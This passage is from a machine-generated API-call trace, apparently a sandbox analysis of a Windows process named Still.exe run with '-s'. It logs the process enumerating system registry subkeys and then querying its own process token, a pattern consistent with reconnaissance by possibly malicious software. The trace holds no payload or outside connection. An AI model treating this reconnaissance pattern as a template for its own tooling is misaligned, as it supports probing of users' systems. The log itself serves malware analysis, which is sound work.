(HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682f28 [0155.787] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x36, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0155.787] lstrlenW (lpString="NetworkProvider") returned 15 [0155.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682de8 [0155.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682de8 | out: hHeap=0x660000) returned 1 [0155.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682bb8 [0155.787] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x37, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkSetup2") returned 0x0 [0155.787] lstrlenW (lpString="NetworkSetup2") returned 13 [0155.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682c30 [0155.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682c30 | out: hHeap=0x660000) returned 1 [0155.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682a50 [0155.787] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x38, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkUxManager") returned 0x0 [0155.788] lstrlenW (lpString="NetworkUxManager") returned 16 [0155.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682cd0 [0155.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682cd0 | out: hHeap=0x660000) returned 1 [0155.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674b40 [0155.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682ac8 [0155.788] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x39, lpName=0x19fd50, cchName=0x104 | out: lpName="Nls") returned 0x0 [0155.788] lstrlenW (lpString="Nls") returned 3 [0155.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674ce0 [0155.788] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3a, lpName=0x19fd50, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0155.788] lstrlenW (lpString="NodeInterfaces") returned 14 [0155.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674d00 [0155.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675f70 [0155.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675f70 | out: hHeap=0x660000) returned 1 [0155.788] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3b, lpName=0x19fd50, cchName=0x104 | out: lpName="Notifications") returned 0x0 [0155.788] lstrlenW (lpString="Notifications") returned 13 [0155.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x675f70 [0155.789] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3c, lpName=0x19fd50, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0155.789] lstrlenW (lpString="Nsi") returned 3 [0155.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674d20 [0155.789] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3d, lpName=0x19fd50, cchName=0x104 | out: lpName="OSExtensionDatabase") returned 0x0 [0155.789] lstrlenW (lpString="OSExtensionDatabase") returned 19 [0155.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x676000 [0155.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682b18 [0155.789] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3e, lpName=0x19fd50, cchName=0x104 | out: lpName="PnP") returned 0x0 [0155.789] lstrlenW (lpString="PnP") returned 3 [0155.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674b60 [0155.789] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x3f, lpName=0x19fd50, cchName=0x104 | out: lpName="Power") returned 0x0 [0155.789] lstrlenW (lpString="Power") returned 5 [0155.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674b80 [0155.790] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x40, lpName=0x19fd50, cchName=0x104 | out: lpName="Print") returned 0x0 [0155.790] lstrlenW (lpString="Print") returned 5 [0155.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674d60 [0155.790] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x41, lpName=0x19fd50, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0155.790] lstrlenW (lpString="PriorityControl") returned 15 [0155.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682ca8 [0155.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682cd0 [0155.790] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682cd0 | out: hHeap=0x660000) returned 1 [0155.790] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x42, lpName=0x19fd50, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0155.790] lstrlenW (lpString="ProductOptions") returned 14 [0155.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682b40 [0155.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682de8 [0155.790] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x43, lpName=0x19fd50, cchName=0x104 | out: lpName="RadioManagement") returned 0x0 [0155.790] lstrlenW (lpString="RadioManagement") returned 15 [0155.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674be0 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675fa0 [0155.791] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x44, lpName=0x19fd50, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0155.791] lstrlenW (lpString="Remote Assistance") returned 17 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682be0 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675fd0 [0155.791] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x45, lpName=0x19fd50, cchName=0x104 | out: lpName="RetailDemo") returned 0x0 [0155.791] lstrlenW (lpString="RetailDemo") returned 10 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682d48 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674c00 [0155.791] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x46, lpName=0x19fd50, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0155.791] lstrlenW (lpString="SafeBoot") returned 8 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674c20 [0155.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x66a540 [0155.792] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x47, lpName=0x19fd50, cchName=0x104 | out: lpName="SAM") returned 0x0 [0155.792] lstrlenW (lpString="SAM") returned 3 [0155.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683398 [0155.792] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x48, lpName=0x19fd50, cchName=0x104 | out: lpName="ScEvents") returned 0x0 [0155.792] lstrlenW (lpString="ScEvents") returned 8 [0155.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x683338 [0155.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682e38 [0155.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0155.792] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x49, lpName=0x19fd50, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0155.792] lstrlenW (lpString="ScsiPort") returned 8 [0155.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683478 [0155.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6832f8 [0155.792] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4a, lpName=0x19fd50, cchName=0x104 | out: lpName="SecureBoot") returned 0x0 [0155.792] lstrlenW (lpString="SecureBoot") returned 10 [0155.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682d70 [0155.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6833b8 [0155.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6833b8 | out: hHeap=0x660000) returned 1 [0155.793] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4b, lpName=0x19fd50, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0155.793] lstrlenW (lpString="SecurePipeServers") returned 17 [0155.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682e38 [0155.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0155.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683498 [0155.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682c08 [0155.793] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4c, lpName=0x19fd50, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0155.793] lstrlenW (lpString="SecurityProviders") returned 17 [0155.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682c30 [0155.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682c30 | out: hHeap=0x660000) returned 1 [0155.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x682c30 [0155.793] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4d, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceAggregatedEvents") returned 0x0 [0155.794] lstrlenW (lpString="ServiceAggregatedEvents") returned 23 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682cd0 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675c70 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682d20 [0155.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d20 | out: hHeap=0x660000) returned 1 [0155.794] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4e, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0155.794] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682d20 [0155.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d20 | out: hHeap=0x660000) returned 1 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6834b8 [0155.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6834b8 | out: hHeap=0x660000) returned 1 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x683638 [0155.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683638 | out: hHeap=0x660000) returned 1 [0155.794] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x4f, lpName=0x19fd50, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0155.794] lstrlenW (lpString="ServiceProvider") returned 15 [0155.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682d20 [0155.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d20 | out: hHeap=0x660000) returned 1 [0155.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682e38 [0155.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0155.795] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x50, lpName=0x19fd50, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0155.795] lstrlenW (lpString="Session Manager") returned 15 [0155.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682d20 [0155.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682e38 [0155.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0155.795] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x51, lpName=0x19fd50, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0155.795] lstrlenW (lpString="SNMP") returned 4 [0155.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683278 [0155.795] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x52, lpName=0x19fd50, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0155.795] lstrlenW (lpString="SQMServiceList") returned 14 [0155.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675d60 [0155.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6833f8 [0155.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6833f8 | out: hHeap=0x660000) returned 1 [0155.796] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x53, lpName=0x19fd50, cchName=0x104 | out: lpName="Srp") returned 0x0 [0155.796] lstrlenW (lpString="Srp") returned 3 [0155.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6834b8 [0155.796] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x54, lpName=0x19fd50, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0155.796] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0155.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683358 [0155.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683358 | out: hHeap=0x660000) returned 1 [0155.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x682e38 [0155.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0155.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682e38 [0155.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0155.796] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x55, lpName=0x19fd50, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0155.796] lstrlenW (lpString="StillImage") returned 10 [0155.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6835f8 [0155.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6833d8 [0155.797] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x56, lpName=0x19fd50, cchName=0x104 | out: lpName="Storage") returned 0x0 [0155.797] lstrlenW (lpString="Storage") returned 7 [0155.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682e38 [0155.797] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x57, lpName=0x19fd50, cchName=0x104 | out: lpName="StorageManagement") returned 0x0 [0155.797] lstrlenW (lpString="StorageManagement") returned 17 [0155.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x683f88 [0155.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683f88 | out: hHeap=0x660000) returned 1 [0155.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675e20 [0155.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675e20 | out: hHeap=0x660000) returned 1 [0155.798] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x58, lpName=0x19fd50, cchName=0x104 | out: lpName="StorPort") returned 0x0 [0155.798] lstrlenW (lpString="StorPort") returned 8 [0155.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6832d8 [0155.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683538 [0155.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683538 | out: hHeap=0x660000) returned 1 [0155.798] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x59, lpName=0x19fd50, cchName=0x104 | out: lpName="StSec") returned 0x0 [0155.798] lstrlenW (lpString="StSec") returned 5 [0155.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x6835b8 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683318 [0155.799] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5a, lpName=0x19fd50, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0155.799] lstrlenW (lpString="SystemResources") returned 15 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683f38 [0155.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683f38 | out: hHeap=0x660000) returned 1 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683a60 [0155.799] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5b, lpName=0x19fd50, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0155.799] lstrlenW (lpString="TabletPC") returned 8 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683c68 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x6834d8 [0155.799] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5c, lpName=0x19fd50, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0155.799] lstrlenW (lpString="Terminal Server") returned 15 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683dd0 [0155.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683bc8 [0155.800] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5d, lpName=0x19fd50, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0155.800] lstrlenW (lpString="TimeZoneInformation") returned 19 [0155.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683558 [0155.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6833b8 [0155.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x675e20 [0155.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675e20 | out: hHeap=0x660000) returned 1 [0155.800] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5e, lpName=0x19fd50, cchName=0x104 | out: lpName="Ubpm") returned 0x0 [0155.800] lstrlenW (lpString="Ubpm") returned 4 [0155.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6833f8 [0155.800] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x5f, lpName=0x19fd50, cchName=0x104 | out: lpName="usb") returned 0x0 [0155.800] lstrlenW (lpString="usb") returned 3 [0155.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683298 [0155.800] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x60, lpName=0x19fd50, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0155.801] lstrlenW (lpString="usbflags") returned 8 [0155.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683d58 [0155.801] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x61, lpName=0x19fd50, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0155.801] lstrlenW (lpString="usbstor") returned 7 [0155.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x683d30 [0155.801] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x62, lpName=0x19fd50, cchName=0x104 | out: lpName="VAN") returned 0x0 [0155.801] lstrlenW (lpString="VAN") returned 3 [0155.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683598 [0155.801] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x63, lpName=0x19fd50, cchName=0x104 | out: lpName="Video") returned 0x0 [0155.801] lstrlenW (lpString="Video") returned 5 [0155.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x6835d8 [0155.801] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x64, lpName=0x19fd50, cchName=0x104 | out: lpName="WalletService") returned 0x0 [0155.801] lstrlenW (lpString="WalletService") returned 13 [0155.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683f10 [0155.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x683df8 [0155.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683df8 | out: hHeap=0x660000) returned 1 [0155.802] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x65, lpName=0x19fd50, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0155.802] lstrlenW (lpString="wcncsvc") returned 7 [0155.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x683ab0 [0155.802] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x66, lpName=0x19fd50, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0155.802] lstrlenW (lpString="Wdf") returned 3 [0155.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683358 [0155.802] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x67, lpName=0x19fd50, cchName=0x104 | out: lpName="WDI") returned 0x0 [0155.802] lstrlenW (lpString="WDI") returned 3 [0155.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683378 [0155.802] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x68, lpName=0x19fd50, cchName=0x104 | out: lpName="Windows") returned 0x0 [0155.802] lstrlenW (lpString="Windows") returned 7 [0155.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x683b78 [0155.802] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x69, lpName=0x19fd50, cchName=0x104 | out: lpName="WinInit") returned 0x0 [0155.802] lstrlenW (lpString="WinInit") returned 7 [0155.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6832b8 [0155.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6834f8 [0155.803] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6a, lpName=0x19fd50, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0155.803] lstrlenW (lpString="Winlogon") returned 8 [0155.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683df8 [0155.803] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6b, lpName=0x19fd50, cchName=0x104 | out: lpName="WMI") returned 0x0 [0155.803] lstrlenW (lpString="WMI") returned 3 [0155.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683418 [0155.803] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6c, lpName=0x19fd50, cchName=0x104 | out: lpName="WorkplaceJoin") returned 0x0 [0155.803] lstrlenW (lpString="WorkplaceJoin") returned 13 [0155.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683bf0 [0155.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683438 [0155.803] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6d, lpName=0x19fd50, cchName=0x104 | out: lpName="WPN") returned 0x0 [0155.804] lstrlenW (lpString="WPN") returned 3 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683458 [0155.804] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6e, lpName=0x19fd50, cchName=0x104 | out: lpName="{7746D80F-97E0-4E26-9543-26B41FC22F79}") returned 0x0 [0155.804] lstrlenW (lpString="{7746D80F-97E0-4E26-9543-26B41FC22F79}") returned 38 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x683518 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683618 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683538 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683578 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x675e20 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x683638 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683258 [0155.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6839b8 [0155.805] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x6f, lpName=0x19fd50, cchName=0x104 | out: lpName="BGFX") returned 0x0 [0155.805] lstrlenW (lpString="BGFX") returned 4 [0155.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x6839f8 [0155.805] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x70, lpName=0x19fd50, cchName=0x104 | out: lpName="BitlockerStatus") returned 0x0 [0155.805] lstrlenW (lpString="BitlockerStatus") returned 15 [0155.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683e98 [0155.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683c18 [0155.805] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x71, lpName=0x19fd50, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0155.805] lstrlenW (lpString="hivelist") returned 8 [0155.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x683c90 [0155.805] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x72, lpName=0x19fd50, cchName=0x104 | out: lpName="hiveredirectionlist") returned 0x0 [0155.805] lstrlenW (lpString="hiveredirectionlist") returned 19 [0155.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x34) returned 0x677c70 [0155.806] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x73, lpName=0x19fd50, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0155.806] lstrlenW (lpString="SystemInformation") returned 17 [0155.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683ee8 [0155.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683ee8 | out: hHeap=0x660000) returned 1 [0155.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x6842f8 [0155.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6842f8 | out: hHeap=0x660000) returned 1 [0155.806] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x74, lpName=0x19fd50, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0155.806] lstrlenW (lpString="Winresume") returned 9 [0155.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683ba0 [0155.806] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x75, lpName=0x19fd50, cchName=0x104 | out: lpName="winresume") returned 0x103 [0155.806] RegCloseKey (hKey=0x20c) returned 0x0 [0155.806] GetCommandLineW () returned="C:\\WINDOWS\\SysWOW64\\Still.exe -s" [0155.806] StrChrW (lpStart="C:\\WINDOWS\\SysWOW64\\Still.exe -s", wMatch=0x20) returned=" -s" [0155.806] StrTrimW (in: psz="-s", pszTrimChars=" " | out: psz="-s") returned 0 [0155.806] GetVersion () returned 0x23f00206 [0155.807] GetCurrentProcess () returned 0xffffffff [0155.807] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x19ff20 | out: TokenHandle=0x19ff20*=0x20c) returned 1 [0155.807] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x14, TokenInformation=0x19ff18, TokenInformationLength=0x4, ReturnLength=0x19ff24 | out: TokenInformation=0x19ff18, ReturnLength=0x19ff24) returned 1 [0155.807] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ff24 | out: 